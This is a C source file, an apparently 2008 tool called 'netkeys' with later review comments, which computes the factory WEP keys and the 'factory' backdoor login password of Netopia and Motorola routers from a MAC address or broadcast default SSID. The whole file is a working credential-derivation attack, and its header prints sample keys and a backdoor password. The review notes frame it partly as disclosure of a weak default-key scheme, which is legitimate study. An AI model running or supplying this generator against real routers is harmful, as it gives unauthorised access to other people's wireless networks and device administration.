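/*
 * Simple code that generates WEP keys and factory password
 * when supplied netopia MAC or SSID
 *
 * WEP algorithm was discovered around 2006 and published around 2007
 * so yes, it's old news.
 *
 * g++ -s netkeys.cpp -onetkeys -lcrypto
 *
 * example:
 *
 * # netkeys 000FCC0EF486
 *
 *     Netkeys - Netopia key generator.
 *     (x) June 2008 - wyse101 0x40 gmail.com
 *
 *     MAC: 000FCC0EF486
 *     Base Serial: 980102 [ 0EF486 ]
 *     OUI: 0xFCC [ Netopia ]
 *     Full Serial: 17757318
 *     SSID: 03575512
 *     Backdoor: username="factory" password="ulwmwztr"
 *
 *     WEP key #1: df46176a279bac0c3042b76be5
 *     WEP key #2: 3a9c9b1c74808ec3f55b15e869
 *     WEP key #3: df99f58fe690fcda8635bf978c
 *     WEP key #4: 36f93022303a67aa924b47946b
 *
 * Review notes:
 *
 * - Every value printed is a deterministic function of the device MAC (or of
 *   the default SSID, which main() maps back to a MAC) and of constants
 *   compiled into this file; no per-device secret enters the derivation.
 *   Units still on these factory defaults need the WEP keys and the "factory"
 *   credentials replaced or disabled.
 * - The SSID branch of main() used to OR the OUI in through an
 *   `unsigned long *` alias of the 64-bit MAC. Where unsigned long is 64 bits
 *   wide, index [1] wrote past the variable. It is now a single 64-bit OR
 *   that yields the value the old code produced on 32-bit little-endian
 *   builds.
 * - <ctype.h> classifiers now receive `unsigned char` values.
 */

/*
 * The header names were missing from the listing as published; these are the
 * ones the calls below require (SHA1_* comes from OpenSSL's libcrypto).
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#include <openssl/sha.h>

/* Upper bound on how many characters of the decimal serial fold() consumes. */
#define MAX_SERIAL 14

/* OUI 0xFCC shifted into bits 24..35 of a 48-bit MAC held in a 64-bit integer. */
#define NETOPIA_OUI_BITS 0xFCC000000ULL

/* since mingw uses MSVCRT printf, and this doesn't recognise %ll format,
   we use %I64 for win32 and %ll for *nix.. */
#ifdef WIN32
const char format[]="\n\tMAC: %012I64X\n\tBase Serial: %I64d [ 0x%06I64X ]\n\t"
                    "OUI: 0x%I64X [ %s ]\n\tFull Serial: %I64d\n\tSSID: %08I64o";
#else
const char format[]="\n\tMAC: %012llX\n\tBase Serial: %llu [ 0x%06llX ]\n\t"
                    "OUI: 0x%llX [ %s ]\n\tFull Serial: %lld\n\tSSID: %08llo";
#endif

/* Lyrics are by Jimi Hendrix, "Third Stone From The Sun" */
/* Each line is hashed together with the folded serial in print_wepkeys(). */
const char *lyrics[8] = {
    "Although your world wonders me, ",
    "with your superior cackling hen,",
    "Your people I do not understand,",
    "So to you I shall put an end and",
    "You'll never hear surf music aga",
    "Strange beautiful grassy green, ",
    "With your majestic silver seas, ",
    "Your mysterious mountains I wish"
};

/* English names of the decimal digits, indexed by digit value. */
const char *digits[10] = {
    "Zero", "One", "Two", "Three", "Four",
    "Five", "Six", "Seven", "Eight", "Nine"
};

/*
 * Append the English name of every decimal digit found in the first
 * MAX_SERIAL characters of `str` to `output`; other characters are skipped.
 *
 * `output` must already hold a NUL-terminated string, because strcat() is
 * used. The caller owns its size: the longest digit name has five letters,
 * so the worst case appended here is MAX_SERIAL * 5 characters plus the
 * terminator.
 *
 * Returns `output`.
 */
char *fold(char output[], char str[])
{
    for (char *p = str; *p && (p - str) < MAX_SERIAL; p++) {
        if (*p >= '0' && *p <= '9') {
            strcat(output, digits[*p - '0']);
        }
    }
    return output;
}

/*
 * Print the four 13-byte WEP keys derived from the serial passed in `mac`.
 *
 * The serial is rendered in decimal and spelled out digit by digit with
 * fold(). That text is hashed with SHA-1 together with each of the eight
 * lyric lines, and the first 16 bytes of every digest are stored back to
 * back in `keys`. The keys are then read as consecutive 13-byte windows
 * starting at offset 0, so only bytes 0..51 of the buffer are printed; the
 * digests for lyric lines 5-8 are computed but never read here.
 */
void print_wepkeys(unsigned long long mac)
{
    SHA_CTX ctx;
    char serial[32];
    unsigned char dgst[SHA_DIGEST_LENGTH];
    unsigned char keys[16 * 8] = {0};
    char sha1_input[128] = {0};     /* zeroed so fold() can strcat() into it */

    /* %llu matches the unsigned argument; the original used %lld. */
    snprintf(serial, sizeof(serial), "%llu", mac);
    size_t input_len = strlen(fold(sha1_input, serial));

    for (int i = 0; i < 8; i++) {
        SHA1_Init(&ctx);
        SHA1_Update(&ctx, sha1_input, input_len);
        SHA1_Update(&ctx, lyrics[i], strlen(lyrics[i]));
        SHA1_Final(dgst, &ctx);
        memcpy(&keys[i * 16], dgst, 16);
    }

    for (int i = 0; i < 4; i++) {
        printf("\n\tWEP key #%d: ", i + 1);
        for (int j = 0; j < 13; j++) {
            printf("%02x", keys[(i * 13) + j]);
        }
    }
}

/*
 * Print the eight-letter password of the "factory" account for the serial
 * passed in `mac`: each letter is (serial mod 26) mapped onto 'a'..'z', and
 * the serial is shifted right by two bits between letters.
 *
 * NOTE(review): the working copy is `unsigned long`, which is 32 bits on the
 * Win32 build the author describes and 64 bits on LP64 systems. Serials that
 * do not fit in 32 bits (possible only through main()'s default OUI branch)
 * therefore give platform-dependent output. The width is left as written
 * because the listing does not say which one matches the devices.
 */
void print_password(unsigned long long mac)
{
    char password[16] = {0};
    unsigned long serial = (unsigned long)mac;

    for (int i = 0; i < 8; i++) {
        password[i] = (char)((serial % 26) + 'a');
        serial >>= 2;
    }
    printf("\n\tBackdoor: username=\"factory\" password=\"%s\"\n", password);
}

/*
 * Entry point. argv[1] is either a 12-digit hexadecimal MAC or an 8-digit
 * octal default SSID; anything else is rejected with a message. The exit
 * status is 0 on every path, as in the original.
 */
int main(int argc, char *argv[])
{
    unsigned long long mac = 0;
    char *p;
    const char *vendor;     /* only ever points at string literals */
    size_t inputLen;

    if (argc == 1) {
        puts("\n\t" "Netkeys - Netopia key generator."
             "\n\t(x) June 2008 - wyse101 0x40 gmail.com");
        /* The argument placeholder after "netkeys" is absent in the listing
           (presumably lost when the page was extracted); the string is kept
           as published. */
        printf("\n\tUsage: netkeys \n");
        return 0;
    }

    inputLen = strlen(argv[1]);

    // check if octal SSID and convert to binary
    if (inputLen == 8) {
        for (p = argv[1]; (*p >= '0') && (*p <= '7'); p++) {
            mac = (mac << 3) | (unsigned long long)(*p - '0');
        }

        if (p - argv[1] != 8) {
            printf("\nInvalid SSID: %s\n", argv[1]);
            return 0;
        }
        // only using 0xFCC OUI since these are the most popular WEP routers for ??
        // using the MAC is fine though, so you're not limited to generating
        // keys for newer/older models.
        mac ^= 0xFCC;
        // Single 64-bit OR instead of writing through an unsigned long alias:
        // no out-of-bounds store on LP64, no dependence on byte order.
        mac |= NETOPIA_OUI_BITS;
    } else if (inputLen == 12) {
        // <ctype.h> functions require a value representable as unsigned char.
        for (p = argv[1]; isxdigit((unsigned char)*p); p++) {
            int c = tolower((unsigned char)*p);
            int nibble = (c >= 'a') ? (c - 'a' + 10) : (c - '0');
            mac = (mac << 4) | (unsigned long long)nibble;
        }

        if (p - argv[1] != 12) {
            printf("\nInvalid MAC: %s\n", argv[1]);
            return 0;
        }
    } else {
        printf("\nNot a valid MAC or SSID : \"%s\"\n", argv[1]);
        return 0;
    }

    puts("\n\t" "Netkeys - Netopia key generator."
         "\n\t(x) June 2008 - wyse101 0x40 gmail.com");

    // get the OUI
    unsigned long long ssid, base, serial, oui;
    oui = (mac >> 24);

    // get the base serial number
    ssid = serial = base = (mac & 0xFFFFFF);

    // The full serial carries a per-vendor prefix above bit 23, and the
    // default SSID is the base serial XORed with the OUI (printed in octal).
    switch (oui) {
    case 0xC5:
        vendor = "Netopia (formerly known as Farallon)";
        ssid ^= 0xC5;
        break;
    case 0xFCC:
        vendor = "Netopia";
        serial |= 0x1000000;
        ssid ^= 0xFCC;
        break;
    case 0x1D6B:
        vendor = "Motorola (formerly Netopia)";
        serial |= 0x2000000;
        ssid ^= 0x1D6B;
        break;
    default:
        vendor = "Motorola";
        serial |= (oui << 24);
        ssid ^= oui;
        break;
    }

    printf(format, mac, base, base, oui, vendor, serial, ssid);
    print_password(serial);
    print_wepkeys(serial);

    printf("\n");
    return 0;
}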